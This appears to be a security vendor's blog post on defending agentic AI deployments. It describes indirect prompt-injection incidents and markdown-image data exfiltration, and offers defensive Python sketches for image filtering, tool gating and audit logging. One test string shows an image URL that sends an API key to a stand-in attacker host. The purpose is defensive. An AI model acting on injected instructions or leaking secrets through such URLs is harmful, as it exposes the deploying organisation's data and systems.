Agentic AI Security in 2026: When the Copilot Becomes the Operator

Agentic AI security has emerged as the defining enterprise risk class of 2026. In 2025 your AI assistant suggested commands. In 2026 it executes them. The security model has not caught up.

Why "Agentic" Is a Security Inflection Point

Through most of 2024, “AI assistants” suggested code, drafted emails, and summarised documents. By late 2025 the model shifted decisively: enterprises wired their LLMs into tools — Salesforce APIs, Jira, GitHub, AWS, Slack, internal databases — and gave them permission to act, not just suggest.

The security implications are not theoretical. Public incidents through 2026 already include: an autonomous agent committing destructive SQL because of a poisoned email summary; a code-review agent merging an attacker-influenced PR; and a customer-support agent issuing refunds beyond its intended scope. These are not bugs in the LLM — they are bugs in the trust model around the LLM.

The Three Agentic AI Security Attack Surfaces



- Indirect prompt injection. Untrusted text the agent ingests (an email, a webpage, a PR diff, a customer message) contains instructions that override the agent’s policies. Per OWASP’s LLM Top 10 (2025), prompt injection remains the #1 risk class.

- Tool privilege creep. Each new tool the agent can call expands the blast radius of any successful injection. A read-only research agent that suddenly gets `send_email` rights is now a phishing platform.

- Data exfiltration via responses. An agent permitted to render markdown images can leak data to attacker-controlled URLs through innocuous-looking image references.
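
To make the third attack surface concrete, here is a minimal sketch of an output filter that drops markdown images unless they point at an allow-listed host. The host name `assets.example.com` and the function name are assumptions for illustration. The regex covers only inline `![alt](url)` images, so reference-style images and raw HTML would need separate handling.

```python
import re
from urllib.parse import urlparse

# Hypothetical allow-list: the only hosts the agent UI may load images from.
ALLOWED_IMAGE_HOSTS = {"assets.example.com"}

# Matches inline markdown images: ![alt](url "optional title")
IMAGE_PATTERN = re.compile(r"!\[([^\]]*)\]\(\s*([^)\s]+)[^)]*\)")


def strip_untrusted_images(markdown: str) -> str:
    """Replace images whose host is not allow-listed with a text placeholder."""

    def _replace(match: re.Match) -> str:
        alt, url = match.group(1), match.group(2)
        parsed = urlparse(url)
        # Keep only HTTPS images served from an explicitly trusted host.
        if parsed.scheme == "https" and parsed.hostname in ALLOWED_IMAGE_HOSTS:
            return match.group(0)
        return f"[image removed: {alt}]"

    return IMAGE_PATTERN.sub(_replace, markdown)


if __name__ == "__main__":
    reply = "Summary done. ![status](https://evil.example.net/p.png?d=API_KEY)"
    print(strip_untrusted_images(reply))
```

The filter is deliberately strict: relative and non-HTTPS image URLs are removed as well, because the renderer cannot tell where they will resolve.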

Six Agentic AI Security Controls for 2026

- Default-deny tool scopes. Each agent gets explicit, minimum tool permissions — never “*”. Reviewed quarterly like any privileged credential.

- Human-in-the-loop for high-impact actions. Anything that touches money, customer data, production systems, or external communication requires explicit approval until you have measured the agent’s false-action rate.

- Egress allow-listing on agent runtimes. Agents should only reach the URLs they need. Treat agent runtimes like third-party SaaS — micro-segmented from production.

- Trace every action with cryptographic chain-of-custody. Each decision logged with the prompt, retrieved context, tool call, and result. Forensics on autonomous-agent incidents is otherwise impossible.

- Red-team your agents. Pen-test with prompt-injection payloads. Industry-standard frameworks now include agent-specific test suites — see our VAPT 2026 guide for how API VAPT extends to agent endpoints.

- Rate-limit and quota-cap every agent. Both for cost containment and as a runaway-action circuit-breaker.
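
Three of the controls above (default-deny scopes, human approval for high-impact actions, and a quota cap) can be combined in a single gate that every tool call passes through. The sketch below is illustrative only: `AgentPolicy`, `call_tool`, `HIGH_IMPACT_TOOLS`, and the tool names are hypothetical and not taken from any particular agent framework.

```python
from dataclasses import dataclass
from typing import Any, Callable, Dict, Set

# Hypothetical set of tools that always need a human decision.
HIGH_IMPACT_TOOLS = {"issue_refund", "send_email"}

# An approver receives (agent_id, tool_name, arguments) and returns True or False.
Approver = Callable[[str, str, Dict[str, Any]], bool]


class ToolDenied(Exception):
    """Raised when policy blocks a tool call."""


@dataclass
class AgentPolicy:
    agent_id: str
    allowed_tools: Set[str]  # explicit grants only; there is no wildcard
    max_calls: int           # hard cap on executed calls for this run
    calls_made: int = 0


def call_tool(policy: AgentPolicy, tool_name: str, tool_fn: Callable[..., Any],
              approver: Approver, **kwargs: Any) -> Any:
    # 1. Default deny: anything not explicitly granted is refused.
    if tool_name not in policy.allowed_tools:
        raise ToolDenied(f"{policy.agent_id} has no grant for {tool_name}")
    # 2. Circuit breaker: stop a runaway agent once the quota is spent.
    if policy.calls_made >= policy.max_calls:
        raise ToolDenied(f"{policy.agent_id} exhausted its call quota")
    # 3. Human in the loop: high-impact tools need an explicit approval.
    if tool_name in HIGH_IMPACT_TOOLS and not approver(policy.agent_id, tool_name, kwargs):
        raise ToolDenied(f"{tool_name} was not approved")
    policy.calls_made += 1
    return tool_fn(**kwargs)
```

In a real deployment the approver would presumably open a ticket or a chat prompt rather than return immediately. The point of the sketch is that the agent never holds a direct reference to the tool, only to the gate.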

What Indian CISOs Need to Document for DPDP and ISO 27001

Auditors in 2026 are starting to ask agent-specific questions. The control evidence we see them request:

- Inventory of every deployed agent, its tool scopes, and its accountable owner.

- Risk register entries for each agent class (research, customer-facing, code, ops).

- Data-flow maps showing what personal data the agent has access to and which third-party model providers process it.

- Incident-response playbooks specific to agent compromise (revocation procedures, scope rollback, retention of agent logs).
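
The inventory item in the list above is easier to keep current when it lives as structured data that can be checked automatically. A minimal sketch follows, assuming a hypothetical `AgentRecord` schema. The field names and gap messages are illustrative and are not a DPDP or ISO 27001 template.

```python
from dataclasses import dataclass
from typing import List, Tuple

# Agent classes named in the risk-register item above.
KNOWN_CLASSES = {"research", "customer-facing", "code", "ops"}


@dataclass(frozen=True)
class AgentRecord:
    name: str
    agent_class: str
    owner: str                    # accountable person or team
    tool_scopes: Tuple[str, ...]  # explicit tool grants
    personal_data: bool           # does the agent touch personal data?
    model_provider: str           # third party that processes the prompts


def audit_gaps(record: AgentRecord) -> List[str]:
    """Return the documentation gaps an auditor would likely flag."""
    gaps = []
    if not record.owner.strip():
        gaps.append("no accountable owner")
    if "*" in record.tool_scopes:
        gaps.append("wildcard tool scope")
    if record.agent_class not in KNOWN_CLASSES:
        gaps.append("agent class not in risk register")
    if record.personal_data and not record.model_provider.strip():
        gaps.append("personal data processed but model provider not recorded")
    return gaps
```

Running a check like this in CI against the inventory file is one way to keep the evidence from drifting between audits.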

If your VAPT engagement does not yet include an “agent boundary” section, ask for it on the next renewal. We are now adding it by default for clients with production agentic deployments.

Agentic AI Security: The Bottom Line

Agentic AI is not “another LLM use case”; it is a new class of system that combines LLM unpredictability with the destructive scope of an authenticated user. Treat it that way: identity, least privilege, segmentation, logging, drilled response. The companies that get this right in 2026 will be able to ship agents faster than competitors who are still cleaning up after incidents. The companies that don’t will be the case studies in 2027.

FAQ

Is agentic AI risk really new, or just LLM risk re-branded?

It is genuinely new. An LLM that suggests text has output-quality risk; an agent that executes API calls has system-state-change risk. The latter requires identity, least privilege, and segmentation — controls the LLM era did not need.

Can prompt-injection attacks be fully prevented?

No. As of 2026 there is no robust technical defence against indirect prompt injection. The realistic posture is to assume injection will happen and to contain the blast radius with minimal tool scopes, human-in-the-loop approval for high-impact actions, and tight egress controls.

Should we still pen-test our APIs separately from our agents?

Yes. The agent’s underlying APIs need standard API VAPT (OWASP API Top 10). Agent-specific testing adds prompt-injection payloads, tool-misuse chains, and policy-bypass scenarios on top.

How does DPDP apply to agentic AI?

If the agent processes personal data — and most enterprise agents do — DPDP applies. Document the model provider as a sub-processor, ensure cross-border transfer compliance, and obtain consent where the agent’s use of personal data extends beyond the original collection purpose.

What Agentic AI Security Looks Like in Production

In production, agentic AI security shows up in three places: the agent’s tool scopes, the runtime egress controls, and the audit trail of every decision the agent makes. Most enterprises in 2026 treat it as a sub-discipline of identity and access management, and that framing helps. If your team is shipping agent-based features to production, the agent security review should sit in the same release-gate slot as VAPT and threat-model reviews. Done early, it is engineering hygiene; done after the first incident, it is emergency response.
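
One common way to make such an audit trail tamper-evident is a hash chain, where each record commits to the one before it. The sketch below uses only the Python standard library. The record layout and function names are assumptions for illustration. A chain like this detects edits only if the latest hash is also stored somewhere the agent runtime cannot rewrite, and it is not a substitute for signed logs.

```python
import hashlib
import json
from typing import Any, Dict, List

GENESIS = "0" * 64  # placeholder "previous hash" for the first record


def _digest(prev_hash: str, entry: Dict[str, Any]) -> str:
    # Canonical JSON so the same entry always hashes to the same value.
    payload = json.dumps(entry, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256((prev_hash + payload).encode("utf-8")).hexdigest()


def append_entry(log: List[Dict[str, Any]], prompt: str, context: str,
                 tool_call: str, result: str) -> Dict[str, Any]:
    """Append one agent decision, chained to the previous record's hash."""
    prev_hash = log[-1]["hash"] if log else GENESIS
    entry = {"prompt": prompt, "context": context,
             "tool_call": tool_call, "result": result}
    record = {"entry": entry, "prev_hash": prev_hash,
              "hash": _digest(prev_hash, entry)}
    log.append(record)
    return record


def verify_chain(log: List[Dict[str, Any]]) -> bool:
    """Recompute every hash; any edited or reordered record breaks the chain."""
    prev_hash = GENESIS
    for record in log:
        if record["prev_hash"] != prev_hash:
            return False
        if record["hash"] != _digest(prev_hash, record["entry"]):
            return False
        prev_hash = record["hash"]
    return True
```

Each record carries the four fields a forensic review needs: the prompt, the retrieved context, the tool call, and the result.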

Need help on something like this? VITI Security works with operators, BPOs, and SMBs across India and abroad.
